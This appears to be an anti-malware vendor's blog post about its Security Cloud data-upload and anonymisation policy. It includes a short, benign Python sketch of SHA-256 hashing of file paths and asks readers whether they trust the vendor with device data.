Our policy for this is outlined here, and the anti-malware product’s data transfer is documented in detail in this document. In short, we only upload data necessary to produce the service, we focus on technical data and won’t take personal data, we use hashing of the data when feasible and we anonymize data so we can’t tell whom it came from.
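The hashing idea can be sketched like this; the report fields and the example path are invented for illustration, not the actual telemetry schema:

```python
import hashlib

# Anonymization-by-hashing sketch: upload a one-way hash instead of a
# potentially personal identifier. The backend can still aggregate
# prevalence ("how many devices report this hash?") without ever
# learning the original value. Note: hashing low-entropy values can
# still be reversed by dictionary attack, which is one reason real
# policies also exclude personal data outright.

def anonymize(value: str) -> str:
    return hashlib.sha256(value.encode()).hexdigest()

report = {
    "file_hash": anonymize("C:/Users/alice/Downloads/invoice.exe"),
    "detection": "Trojan.Generic",  # technical, non-personal data
}

# The same file on another device yields the same hash, so prevalence
# can be counted -- but the path itself never leaves the device.
assert report["file_hash"] == anonymize("C:/Users/alice/Downloads/invoice.exe")
print(report)
```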

The trend is clearly towards lighter devices that rely more on cloud services. Our answer to that is Security Cloud. It enables devices to off-load tasks to the cloud and benefit from data collected from the whole community. But to keep up with the threats we must develop Security Cloud constantly. And that also means that we will need more info about what happens on your device.

That’s why I would like to check what your opinion about data upload is. How do you feel about Security Cloud using data from your device to improve the overall security for all users? Do you trust us when we say that we apply strict rules to the data upload to guard your privacy?



Safe surfing,

